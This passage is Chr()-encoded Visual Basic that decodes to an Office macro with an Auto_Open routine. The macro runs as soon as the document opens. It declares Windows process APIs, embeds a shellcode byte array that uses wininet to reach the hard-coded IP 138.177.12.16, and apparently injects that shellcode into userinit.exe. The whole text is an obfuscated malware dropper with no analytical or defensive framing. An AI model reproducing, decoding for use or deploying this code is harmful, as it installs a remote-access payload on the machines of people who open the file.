Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(79)&Chr(117)&Chr(108)&Chr(103)&Chr(120)&Chr(122)&Chr(97)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(65)&Chr(110)&Chr(121)&Chr(44)&Chr(32)&Chr(73)&Chr(117)&Chr(108)&Chr(100)&Chr(102)&Chr(32)&Chr(65)& _ 
Chr(115)&Chr(32)&Chr(65)&Chr(110)&Chr(121)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(87)&Chr(117)&Chr(108)&Chr(97)&Chr(120)&Chr(110)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)& _ 
Chr(97)&Chr(108)&Chr(32)&Chr(66)&Chr(99)&Chr(100)&Chr(108)&Chr(112)&Chr(105)&Chr(97)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(89)&Chr(117)&Chr(108)&Chr(105)&Chr(109)&Chr(122)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(65)&Chr(110)& _ 
Chr(121)&Chr(44)&Chr(32)&Chr(66)&Chr(121)&Chr(86)&Chr(97)&Chr(108)&Chr(32)&Chr(81)&Chr(106)&Chr(105)&Chr(108)&Chr(118)&Chr(102)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(74)&Chr(109)&Chr(101)&Chr(120)&Chr(117)& _ 
Chr(105)&Chr(122)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(84)&Chr(65)&Chr(82)&Chr(84)&Chr(85)&Chr(80)&Chr(73)&Chr(78)&Chr(70)&Chr(79)&Chr(44)&Chr(32)&Chr(76)&Chr(105)&Chr(120)&Chr(115)&Chr(117)&Chr(105)&Chr(110)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(80)&Chr(82)& _ 
Chr(79)&Chr(67)&Chr(69)&Chr(83)&Chr(83)&Chr(95)&Chr(73)&Chr(78)&Chr(70)&Chr(79)&Chr(82)&Chr(77)&Chr(65)&Chr(84)&Chr(73)&Chr(79)&Chr(78)&Chr(41)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(35)&Chr(69)&Chr(110)&Chr(100)&Chr(73)& _ 
Chr(102)&Chr(10)&Chr(10)&Chr(83)&Chr(117)&Chr(98)&Chr(32)&Chr(65)&Chr(117)&Chr(116)&Chr(111)&Chr(95)&Chr(79)&Chr(112)&Chr(101)&Chr(110)&Chr(40)&Chr(41)&Chr(10)&Chr(68)&Chr(105)&Chr(109)&Chr(32)&Chr(78)&Chr(109)&Chr(112)&Chr(105)&Chr(108)&Chr(97)&Chr(32)&Chr(65)&Chr(115)& _ 
Chr(32)&Chr(80)&Chr(82)&Chr(79)&Chr(67)&Chr(69)&Chr(83)&Chr(83)&Chr(95)&Chr(73)&Chr(78)&Chr(70)&Chr(79)&Chr(82)&Chr(77)&Chr(65)&Chr(84)&Chr(73)&Chr(79)&Chr(78)&Chr(10)&Chr(68)&Chr(105)&Chr(109)&Chr(32)&Chr(73)&Chr(108)&Chr(109)&Chr(112)&Chr(111)&Chr(32)&Chr(65)& _ 
Chr(115)&Chr(32)&Chr(83)&Chr(84)&Chr(65)&Chr(82)&Chr(84)&Chr(85)&Chr(80)&Chr(73)&Chr(78)&Chr(70)&Chr(79)&Chr(10)&Chr(68)&Chr(105)&Chr(109)&Chr(32)&Chr(85)&Chr(108)&Chr(110)&Chr(109)&Chr(97)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(83)&Chr(116)&Chr(114)&Chr(105)&Chr(110)& _ 
Chr(103)&Chr(10)&Chr(68)&Chr(105)&Chr(109)&Chr(32)&Chr(75)&Chr(111)&Chr(120)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(68)&Chr(98)&Chr(114)&Chr(102)&Chr(114)&Chr(118)&Chr(106)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(86)&Chr(97)& _ 
Chr(114)&Chr(105)&Chr(97)&Chr(110)&Chr(116)&Chr(44)&Chr(32)&Chr(75)&Chr(121)&Chr(99)&Chr(102)&Chr(111)&Chr(113)&Chr(111)&Chr(99)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(35)&Chr(73)&Chr(102)&Chr(32)&Chr(86)&Chr(98)&Chr(97)&Chr(55)& _ 
Chr(32)&Chr(84)&Chr(104)&Chr(101)&Chr(110)&Chr(10)&Chr(68)&Chr(105)&Chr(109)&Chr(32)&Chr(32)&Chr(67)&Chr(111)&Chr(101)&Chr(102)&Chr(106)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)&Chr(44)&Chr(32)&Chr(66)&Chr(109)&Chr(113)& _ 
Chr(102)&Chr(117)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(80)&Chr(116)&Chr(114)&Chr(10)&Chr(35)&Chr(69)&Chr(108)&Chr(115)&Chr(101)&Chr(10)&Chr(68)&Chr(105)&Chr(109)&Chr(32)&Chr(32)&Chr(67)&Chr(111)&Chr(101)&Chr(102)&Chr(106)&Chr(32)&Chr(65)& _ 
Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(44)&Chr(32)&Chr(66)&Chr(109)&Chr(113)&Chr(102)&Chr(117)&Chr(32)&Chr(65)&Chr(115)&Chr(32)&Chr(76)&Chr(111)&Chr(110)&Chr(103)&Chr(10)&Chr(35)&Chr(69)&Chr(110)&Chr(100)&Chr(73)&Chr(102)&Chr(10)&Chr(68)&Chr(98)&Chr(114)& _ 
Chr(102)&Chr(114)&Chr(118)&Chr(106)&Chr(32)&Chr(61)&Chr(32)&Chr(65)&Chr(114)&Chr(114)&Chr(97)&Chr(121)&Chr(40)&Chr(50)&Chr(51)&Chr(50)&Chr(44)&Chr(49)&Chr(51)&Chr(48)&Chr(44)&Chr(48)&Chr(44)&Chr(48)&Chr(44)&Chr(48)&Chr(44)&Chr(57)&Chr(54)&Chr(44)&Chr(49)&Chr(51)& _ 
Chr(55)&Chr(44)&Chr(50)&Chr(50)&Chr(57)&Chr(44)&Chr(52)&Chr(57)&Chr(44)&Chr(49)&Chr(57)&Chr(50)&Chr(44)&Chr(49)&Chr(48)&Chr(48)&Chr(44)&Chr(49)&Chr(51)&Chr(57)&Chr(44)&Chr(56)&Chr(48)&Chr(44)&Chr(52)&Chr(56)&Chr(44)&Chr(49)&Chr(51)&Chr(57)&Chr(44)&Chr(56)& _ 
Chr(50)&Chr(44)&Chr(49)&Chr(50)&Chr(44)&Chr(49)&Chr(51)&Chr(57)&Chr(44)&Chr(56)&Chr(50)&Chr(44)&Chr(50)&Chr(48)&Chr(44)&Chr(32)&Chr(95)&Chr(13)&Chr(10)&Chr(49)&Chr(51)&Chr(57)&Chr(44)&Chr(49)&Chr(49)&Chr(52)&Chr(44)&Chr(52)&Chr(48)&Chr(44)&Chr(49)&Chr(53)& _ 
Chr(44)&Chr(49)&Chr(56)&Chr(51)&Chr(44)&Chr(55)&Chr(52)&Chr(44)&Chr(51)&Chr(56)&Chr(44)&Chr(52)&Chr(57)&Chr(44)&Chr(50)&Chr(53)&Chr(53)&Chr(44)&Chr(49)&Chr(55)&Chr(50)&Chr(44)&Chr(54)&Chr(48)&Chr(44)&Chr(57)&Chr(55)&Chr(44)&Chr(49)&Chr(50)&Chr(52)&Chr(44)& _ 
Chr(50)&Chr(44)&Chr(52)&Chr(52)&Chr(44)&Chr(51)&Chr(50)&Chr(44)&Chr(49)&Chr(57)&Chr(51)&Chr(44)&Chr(50)&Chr(48)&Chr(55)&Chr(44)&Chr(49)&Chr(51)&Chr(44)&Chr(49)&Chr(44)&Chr(49)&Chr(57)&Chr(57)&Chr(44)&Chr(50)&Chr(50)&Chr(54)&Chr(44)&Chr(50)&Chr(52)&Chr(50)& _ 
Chr(44)&Chr(56)&Chr(50)&Chr(44)&Chr(56)&Chr(55)&Chr(44)&Chr(49)&Chr(51)&Chr(57)&Chr(44)&Chr(56)&Chr(50)&Chr(44)&Chr(49)&Chr(54)&Chr(44)&Chr(49)&Chr(51)&Chr(57)&Chr(44)&Chr(55)&Chr(52)&Chr(44)&Chr(54)&Chr(48)&Chr(44)&Chr(49)&Chr(51)&Chr(57)&Chr(44)&Chr(55)& _ 
Chr(54)&Chr(44)&Chr(49)&Chr(55)&Chr(44)&Chr(49)&Chr(50)&Chr(48)&Chr(44)&Chr(50)&Chr(50)&Chr(55)&Chr(44)&Chr(55)&Chr(50)&Chr(44)&Chr(49)&Chr(44)&Chr(50)&Chr(48)&Chr(57)&Chr(44)&Chr(56)&Chr(49)&Chr(44)&Chr(32)&Chr(95)&Chr(13)&Chr(10)&Chr(49)&Chr(51)&Chr(57)& _ 
Chr(44)&Chr(56)&Chr(57)&Chr(44)&Chr(51)&Chr(50)&Chr(44)&Chr(49)&Chr(44)&Chr(50)&Chr(49)&Chr(49)&Chr(44)&Chr(49)&Chr(51)&Chr(57)&Chr(44)&Chr(55)&Chr(51)&Chr(44)&Chr(50)&Chr(52)&Chr(44)&Chr(50)&Chr(50)&Chr(55)&Chr(44)&Chr(53)&Chr(56)&Chr(44)&Chr(55)&Chr(51)& _ 
Chr(44)&Chr(49)&Chr(51)&Chr(57)&Chr(44)&Chr(53)&Chr(50)&Chr(44)&Chr(49)&Chr(51)&Chr(57)&Chr(44)&Chr(49)&Chr(44)&Chr(50)&Chr(49)&Chr(52)&Chr(44)&Chr(52)&Chr(57)&Chr(44)&Chr(50)&Chr(53)&Chr(53)&Chr(44)&Chr(49)&Chr(55)&Chr(50)&Chr(44)&Chr(49)&Chr(57)&Chr(51)& _ 
Chr(44)&Chr(50)&Chr(48)&Chr(55)&Chr(44)&Chr(49)&Chr(51)&Chr(44)&Chr(49)&Chr(44)&Chr(49)&Chr(57)&Chr(57)&Chr(44)&Chr(53)&Chr(54)&Chr(44)&Chr(50)&Chr(50)&Chr(52)&Chr(44)&Chr(49)&Chr(49)&Chr(55)&Chr(44)&Chr(50)&Chr(52)&Chr(54)&Chr(44)&Chr(51)&Chr(44)&Chr(49)& _ 
Chr(50)&Chr(53)&Chr(44)&Chr(50)&Chr(52)&Chr(56)&Chr(44)&Chr(53)&Chr(57)&Chr(44)&Chr(49)&Chr(50)&Chr(53)&Chr(44)&Chr(51)&Chr(54)&Chr(44)&Chr(49)&Chr(49)&Chr(55)&Chr(44)&Chr(50)&Chr(50)&Chr(56)&Chr(44)&Chr(56)&Chr(56)&Chr(44)&Chr(49)&Chr(51)&Chr(57)&Chr(44)& _ 
Chr(56)&Chr(56)&Chr(44)&Chr(51)&Chr(54)&Chr(44)&Chr(32)&Chr(95)&Chr(13)&Chr(10)&Chr(49)&Chr(44)&Chr(50)&Chr(49)&Chr(49)&Chr(44)&Chr(49)&Chr(48)&Chr(50)&Chr(44)&Chr(49)&Chr(51)&Chr(57)&Chr(44)&Chr(49)&Chr(50)&Chr(44)&Chr(55)&Chr(53)&Chr(44)&Chr(49)&Chr(51)& _ 
Chr(57)&Chr(44)&Chr(56)&Chr(56)&Chr(44)&Chr(50)&Chr(56)&Chr(44)&Chr(49)&Chr(44)&Chr(50)&Chr(49)&Chr(49)&Chr(44)&Chr(49)&Chr(51)&Chr(57)&Chr(44)&Chr(52)&Chr(44)&Chr(49)&Chr(51)&Chr(57)&Chr(44)&Chr(49)&Chr(44)&Chr(50)&Chr(48)&Chr(56)&Chr(44)&Chr(49)&Chr(51)& _ 
Chr(55)&Chr(44)&Chr(54)&Chr(56)&Chr(44)&Chr(51)&Chr(54)&Chr(44)&Chr(51)&Chr(54)&Chr(44)&Chr(57)&Chr(49)&Chr(44)&Chr(57)&Chr(49)&Chr(44)&Chr(57)&Chr(55)&Chr(44)&Chr(56)&Chr(57)&Chr(44)&Chr(57)&Chr(48)&Chr(44)&Chr(56)&Chr(49)&Chr(44)&Chr(50)&Chr(53)&Chr(53)& _ 
Chr(44)&Chr(50)&Chr(50)&Chr(52)&Chr(44)&Chr(57)&Chr(53)&Chr(44)&Chr(57)&Chr(53)&Chr(44)&Chr(57)&Chr(48)&Chr(44)&Chr(49)&Chr(51)&Chr(57)&Chr(44)&Chr(49)&Chr(56)&Chr(44)&Chr(50)&Chr(51)&Chr(53)&Chr(44)&Chr(49)&Chr(52)&Chr(49)&Chr(44)&Chr(57)&Chr(51)&Chr(44)& _ 
Chr(49)&Chr(48)&Chr(52)&Chr(44)&Chr(49)&Chr(49)&Chr(48)&Chr(44)&Chr(49)&Chr(48)&Chr(49)&Chr(44)&Chr(49)&Chr(49)&Chr(54)&Chr(44)&Chr(32)&Chr(95)&Chr(13)&Chr(10)&Chr(48)&Chr(44)&Chr(49)&Chr(48)&Chr(52)&Chr(44)&Chr(49)&Chr(49)&Chr(57)&Chr(44)&Chr(49)&Chr(48)& _ 
Chr(53)&Chr(44)&Chr(49)&Chr(49)&Chr(48)&Chr(44)&Chr(49)&Chr(48)&Chr(53)&Chr(44)&Chr(56)&Chr(52)&Chr(44)&Chr(49)&Chr(48)&Chr(52)&Chr(44)&Chr(55)&Chr(54)&Chr(44)&Chr(49)&Chr(49)&Chr(57)&Chr(44)&Chr(51)&Chr(56)&Chr(44)&Chr(55)&Chr(44)&Chr(50)&Chr(53)&Chr(53)& _ 
Chr(44)&Chr(50)&Chr(49)&Chr(51)&Chr(44)&Chr(52)&Chr(57)&Chr(44)&Chr(50)&Chr(49)&Chr(57)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(49)&Chr(48)&Chr(52)&Chr(44)&Chr(53)& _ 
Chr(56)&Chr(44)&Chr(56)&Chr(54)&Chr(44)&Chr(49)&Chr(50)&Chr(49)&Chr(44)&Chr(49)&Chr(54)&Chr(55)&Chr(44)&Chr(50)&Chr(53)&Chr(53)&Chr(44)&Chr(50)&Chr(49)&Chr(51)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(49)&Chr(48)&Chr(54)&Chr(44)&Chr(51)& _ 
Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(49)&Chr(48)&Chr(54)&Chr(44)&Chr(56)&Chr(48)&Chr(44)&Chr(50)&Chr(51)&Chr(50)&Chr(44)&Chr(50)&Chr(49)&Chr(49)&Chr(44)&Chr(48)&Chr(44)&Chr(48)&Chr(44)&Chr(32)&Chr(95)&Chr(13)&Chr(10)&Chr(48)&Chr(44)& _ 
Chr(52)&Chr(55)&Chr(44)&Chr(56)&Chr(55)&Chr(44)&Chr(54)&Chr(57)&Chr(44)&Chr(54)&Chr(57)&Chr(44)&Chr(55)&Chr(56)&Chr(44)&Chr(54)&Chr(55)&Chr(44)&Chr(56)&Chr(48)&Chr(44)&Chr(56)&Chr(54)&Chr(44)&Chr(54)&Chr(57)&Chr(44)&Chr(56)&Chr(50)&Chr(44)&Chr(57)&Chr(56)& _ 
Chr(44)&Chr(55)&Chr(49)&Chr(44)&Chr(55)&Chr(55)&Chr(44)&Chr(49)&Chr(49)&Chr(57)&Chr(44)&Chr(49)&Chr(49)&Chr(49)&Chr(44)&Chr(53)&Chr(49)&Chr(44)&Chr(54)&Chr(56)&Chr(44)&Chr(52)&Chr(57)&Chr(44)&Chr(49)&Chr(48)&Chr(48)&Chr(44)&Chr(56)&Chr(56)&Chr(44)&Chr(54)& _ 
Chr(54)&Chr(44)&Chr(53)&Chr(49)&Chr(44)&Chr(54)&Chr(53)&Chr(44)&Chr(56)&Chr(54)&Chr(44)&Chr(52)&Chr(53)&Chr(44)&Chr(56)&Chr(50)&Chr(44)&Chr(49)&Chr(48)&Chr(52)&Chr(44)&Chr(53)&Chr(54)&Chr(44)&Chr(49)&Chr(49)&Chr(50)&Chr(44)&Chr(49)&Chr(48)&Chr(53)&Chr(44)& _ 
Chr(57)&Chr(48)&Chr(44)&Chr(49)&Chr(49)&Chr(53)&Chr(44)&Chr(49)&Chr(48)&Chr(57)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(54)&Chr(55)&Chr(44)&Chr(53)&Chr(55)&Chr(44)&Chr(49)&Chr(48)&Chr(57)&Chr(44)&Chr(53)&Chr(55)&Chr(44)&Chr(49)&Chr(49)&Chr(49)&Chr(44)&Chr(32)& _ 
Chr(95)&Chr(13)&Chr(10)&Chr(49)&Chr(48)&Chr(55)&Chr(44)&Chr(52)&Chr(56)&Chr(44)&Chr(56)&Chr(52)&Chr(44)&Chr(49)&Chr(49)&Chr(51)&Chr(44)&Chr(49)&Chr(49)&Chr(56)&Chr(44)&Chr(57)&Chr(53)&Chr(44)&Chr(54)&Chr(55)&Chr(44)&Chr(54)&Chr(56)&Chr(44)&Chr(56)&Chr(48)& _ 
Chr(44)&Chr(55)&Chr(48)&Chr(44)&Chr(49)&Chr(48)&Chr(51)&Chr(44)&Chr(54)&Chr(53)&Chr(44)&Chr(55)&Chr(49)&Chr(44)&Chr(55)&Chr(55)&Chr(44)&Chr(49)&Chr(49)&Chr(55)&Chr(44)&Chr(56)&Chr(54)&Chr(44)&Chr(49)&Chr(49)&Chr(57)&Chr(44)&Chr(56)&Chr(57)&Chr(44)&Chr(49)& _ 
Chr(48)&Chr(51)&Chr(44)&Chr(57)&Chr(55)&Chr(44)&Chr(53)&Chr(52)&Chr(44)&Chr(49)&Chr(49)&Chr(52)&Chr(44)&Chr(49)&Chr(48)&Chr(48)&Chr(44)&Chr(49)&Chr(48)&Chr(51)&Chr(44)&Chr(55)&Chr(54)&Chr(44)&Chr(57)&Chr(56)&Chr(44)&Chr(56)&Chr(57)&Chr(44)&Chr(49)&Chr(49)& _ 
Chr(53)&Chr(44)&Chr(49)&Chr(49)&Chr(56)&Chr(44)&Chr(49)&Chr(48)&Chr(51)&Chr(44)&Chr(49)&Chr(49)&Chr(53)&Chr(44)&Chr(54)&Chr(55)&Chr(44)&Chr(56)&Chr(55)&Chr(44)&Chr(53)&Chr(51)&Chr(44)&Chr(52)&Chr(56)&Chr(44)&Chr(55)&Chr(55)&Chr(44)&Chr(54)&Chr(54)&Chr(44)& _ 
Chr(56)&Chr(57)&Chr(44)&Chr(53)&Chr(49)&Chr(44)&Chr(56)&Chr(52)&Chr(44)&Chr(32)&Chr(95)&Chr(13)&Chr(10)&Chr(49)&Chr(48)&Chr(48)&Chr(44)&Chr(56)&Chr(53)&Chr(44)&Chr(49)&Chr(48)&Chr(49)&Chr(44)&Chr(55)&Chr(56)&Chr(44)&Chr(49)&Chr(50)&Chr(48)&Chr(44)&Chr(49)& _ 
Chr(48)&Chr(53)&Chr(44)&Chr(55)&Chr(50)&Chr(44)&Chr(52)&Chr(56)&Chr(44)&Chr(49)&Chr(49)&Chr(49)&Chr(44)&Chr(56)&Chr(49)&Chr(44)&Chr(57)&Chr(56)&Chr(44)&Chr(57)&Chr(57)&Chr(44)&Chr(53)&Chr(48)&Chr(44)&Chr(49)&Chr(49)&Chr(55)&Chr(44)&Chr(55)&Chr(54)&Chr(44)& _ 
Chr(53)&Chr(51)&Chr(44)&Chr(49)&Chr(49)&Chr(53)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(54)&Chr(56)&Chr(44)&Chr(53)&Chr(49)&Chr(44)&Chr(48)&Chr(44)&Chr(56)&Chr(48)&Chr(44)&Chr(49)&Chr(48)&Chr(52)&Chr(44)&Chr(56)&Chr(55)&Chr(44)&Chr(49)&Chr(51)&Chr(55)&Chr(44)& _ 
Chr(49)&Chr(53)&Chr(57)&Chr(44)&Chr(49)&Chr(57)&Chr(56)&Chr(44)&Chr(50)&Chr(53)&Chr(53)&Chr(44)&Chr(50)&Chr(49)&Chr(51)&Chr(44)&Chr(49)&Chr(51)&Chr(55)&Chr(44)&Chr(49)&Chr(57)&Chr(56)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(49)&Chr(48)&Chr(52)&Chr(44)&Chr(48)& _ 
Chr(44)&Chr(50)&Chr(44)&Chr(57)&Chr(54)&Chr(44)&Chr(49)&Chr(51)&Chr(50)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(32)&Chr(95)&Chr(13)&Chr(10)&Chr(56)&Chr(55)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(56)&Chr(54)&Chr(44)& _ 
Chr(49)&Chr(48)&Chr(52)&Chr(44)&Chr(50)&Chr(51)&Chr(53)&Chr(44)&Chr(56)&Chr(53)&Chr(44)&Chr(52)&Chr(54)&Chr(44)&Chr(53)&Chr(57)&Chr(44)&Chr(50)&Chr(53)&Chr(53)&Chr(44)&Chr(50)&Chr(49)&Chr(51)&Chr(44)&Chr(49)&Chr(53)&Chr(48)&Chr(44)&Chr(49)&Chr(48)&Chr(54)& _ 
Chr(44)&Chr(49)&Chr(48)&Chr(44)&Chr(57)&Chr(53)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(56)&Chr(54)&Chr(44)&Chr(49)&Chr(48)&Chr(52)&Chr(44)&Chr(52)&Chr(53)&Chr(44)&Chr(54)&Chr(44)&Chr(50)& _ 
Chr(52)&Chr(44)&Chr(49)&Chr(50)&Chr(51)&Chr(44)&Chr(50)&Chr(53)&Chr(53)&Chr(44)&Chr(50)&Chr(49)&Chr(51)&Chr(44)&Chr(49)&Chr(51)&Chr(51)&Chr(44)&Chr(49)&Chr(57)&Chr(50)&Chr(44)&Chr(49)&Chr(49)&Chr(55)&Chr(44)&Chr(56)&Chr(44)&Chr(55)&Chr(57)&Chr(44)&Chr(49)& _ 
Chr(49)&Chr(55)&Chr(44)&Chr(50)&Chr(51)&Chr(55)&Chr(44)&Chr(50)&Chr(51)&Chr(50)&Chr(44)&Chr(55)&Chr(52)&Chr(44)&Chr(48)&Chr(44)&Chr(48)&Chr(44)&Chr(48)&Chr(44)&Chr(49)&Chr(48)&Chr(54)&Chr(44)&Chr(54)&Chr(52)&Chr(44)&Chr(32)&Chr(95)&Chr(13)&Chr(10)&Chr(49)& _ 
Chr(48)&Chr(52)&Chr(44)&Chr(48)&Chr(44)&Chr(49)&Chr(54)&Chr(44)&Chr(48)&Chr(44)&Chr(48)&Chr(44)&Chr(49)&Chr(48)&Chr(52)&Chr(44)&Chr(48)&Chr(44)&Chr(48)&Chr(44)&Chr(54)&Chr(52)&Chr(44)&Chr(48)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(49)&Chr(48)&Chr(52)&Chr(44)& _ 
Chr(56)&Chr(56)&Chr(44)&Chr(49)&Chr(54)&Chr(52)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(50)&Chr(50)&Chr(57)&Chr(44)&Chr(50)&Chr(53)&Chr(53)&Chr(44)&Chr(50)&Chr(49)&Chr(51)&Chr(44)&Chr(49)&Chr(52)&Chr(55)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(56)&Chr(51)&Chr(44)& _ 
Chr(49)&Chr(51)&Chr(55)&Chr(44)&Chr(50)&Chr(51)&Chr(49)&Chr(44)&Chr(56)&Chr(55)&Chr(44)&Chr(49)&Chr(48)&Chr(52)&Chr(44)&Chr(48)&Chr(44)&Chr(51)&Chr(50)&Chr(44)&Chr(48)&Chr(44)&Chr(48)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(56)&Chr(54)&Chr(44)&Chr(49)&Chr(48)& _ 
Chr(52)&Chr(44)&Chr(49)&Chr(56)&Chr(44)&Chr(49)&Chr(53)&Chr(48)&Chr(44)&Chr(49)&Chr(51)&Chr(55)&Chr(44)&Chr(50)&Chr(50)&Chr(54)&Chr(44)&Chr(50)&Chr(53)&Chr(53)&Chr(44)&Chr(50)&Chr(49)&Chr(51)&Chr(44)&Chr(49)&Chr(51)&Chr(51)&Chr(44)&Chr(49)&Chr(57)&Chr(50)& _ 
Chr(44)&Chr(32)&Chr(95)&Chr(13)&Chr(10)&Chr(49)&Chr(49)&Chr(54)&Chr(44)&Chr(50)&Chr(48)&Chr(55)&Chr(44)&Chr(49)&Chr(51)&Chr(57)&Chr(44)&Chr(55)&Chr(44)&Chr(49)&Chr(44)&Chr(49)&Chr(57)&Chr(53)&Chr(44)&Chr(49)&Chr(51)&Chr(51)&Chr(44)&Chr(49)&Chr(57)&Chr(50)& _ 
Chr(44)&Chr(49)&Chr(49)&Chr(55)&Chr(44)&Chr(50)&Chr(50)&Chr(57)&Chr(44)&Chr(56)&Chr(56)&Chr(44)&Chr(49)&Chr(57)&Chr(53)&Chr(44)&Chr(57)&Chr(53)&Chr(44)&Chr(50)&Chr(51)&Chr(50)&Chr(44)&Chr(49)&Chr(51)&Chr(57)&Chr(44)&Chr(50)&Chr(53)&Chr(53)&Chr(44)&Chr(50)& _ 
Chr(53)&Chr(53)&Chr(44)&Chr(50)&Chr(53)&Chr(53)&Chr(44)&Chr(52)&Chr(57)&Chr(44)&Chr(53)&Chr(49)&Chr(44)&Chr(53)&Chr(54)&Chr(44)&Chr(52)&Chr(54)&Chr(44)&Chr(52)&Chr(57)&Chr(44)&Chr(53)&Chr(55)&Chr(44)&Chr(53)&Chr(53)&Chr(44)&Chr(52)&Chr(54)&Chr(44)&Chr(52)& _ 
Chr(57)&Chr(44)&Chr(53)&Chr(48)&Chr(44)&Chr(52)&Chr(54)&Chr(44)&Chr(52)&Chr(57)&Chr(44)&Chr(53)&Chr(52)&Chr(44)&Chr(48)&Chr(44)&Chr(49)&Chr(56)&Chr(55)&Chr(44)&Chr(50)&Chr(52)&Chr(48)&Chr(44)&Chr(49)&Chr(56)&Chr(49)&Chr(44)&Chr(49)&Chr(54)&Chr(50)&Chr(44)& _ 
Chr(56)&Chr(54)&Chr(44)&Chr(49)&Chr(48)&Chr(54)&Chr(44)&Chr(48)&Chr(44)&Chr(56)&Chr(51)&Chr(44)&Chr(32)&Chr(95)&Chr(13)&Chr(10)&Chr(50)&Chr(53)&Chr(53)&Chr(44)&Chr(50)&Chr(49)&Chr(51)&Chr(41)&Chr(10)&Chr(10)&Chr(73)&Chr(102)&Chr(32)&Chr(76)&Chr(101)&Chr(110)& _ 
Chr(40)&Chr(69)&Chr(110)&Chr(118)&Chr(105)&Chr(114)&Chr(111)&Chr(110)&Chr(40)&Chr(34)&Chr(80)&Chr(114)&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)&Chr(87)&Chr(54)&Chr(52)&Chr(51)&Chr(50)&Chr(34)&Chr(41)&Chr(41)&Chr(32)&Chr(62)&Chr(32)&Chr(48)&Chr(32)&Chr(84)&Chr(104)& _ 
Chr(101)&Chr(110)&Chr(10)&Chr(69)&Chr(120)&Chr(99)&Chr(100)&Chr(97)&Chr(32)&Chr(61)&Chr(32)&Chr(69)&Chr(110)&Chr(118)&Chr(105)&Chr(114)&Chr(111)&Chr(110)&Chr(40)&Chr(34)&Chr(119)&Chr(105)&Chr(110)&Chr(100)&Chr(105)&Chr(114)&Chr(34)&Chr(41)&Chr(32)&Chr(38)&Chr(32)&Chr(34)& _ 
Chr(92)&Chr(92)&Chr(83)&Chr(121)&Chr(115)&Chr(87)&Chr(79)&Chr(87)&Chr(54)&Chr(52)&Chr(92)&Chr(92)&Chr(117)&Chr(115)&Chr(101)&Chr(114)&Chr(105)&Chr(110)&Chr(105)&Chr(116)&Chr(46)&Chr(101)&Chr(120)&Chr(101)&Chr(34)&Chr(10)&Chr(101)&Chr(108)&Chr(115)&Chr(101)&Chr(10)&Chr(69)& _ 
Chr(120)&Chr(99)&Chr(100)&Chr(97)&Chr(32)&Chr(61)&Chr(32)&Chr(69)&Chr(110)&Chr(118)&Chr(105)&Chr(114)&Chr(111)&Chr(110)&Chr(40)&Chr(34)&Chr(119)&Chr(105)&Chr(110)&Chr(100)&Chr(105)&Chr(114)&Chr(34)&Chr(41)&Chr(32)&Chr(38)&Chr(32)&Chr(34)&Chr(92)&Chr(92)&Chr(83)&Chr(121)& _ 
Chr(115)&Chr(116)&Chr(101)&Chr(109)&Chr(51)&Chr(50)&Chr(92)&Chr(92)&Chr(117)&Chr(115)&Chr(101)&Chr(114)&Chr(105)&Chr(110)&Chr(105)&Chr(116)&Chr(46)&Chr(101)&Chr(120)&Chr(101)&Chr(34)&Chr(10)&Chr(69)&Chr(110)&Chr(100)&Chr(32)&Chr(73)&Chr(102)&Chr(10)&Chr(10)&Chr(66)&Chr(109)& _ 
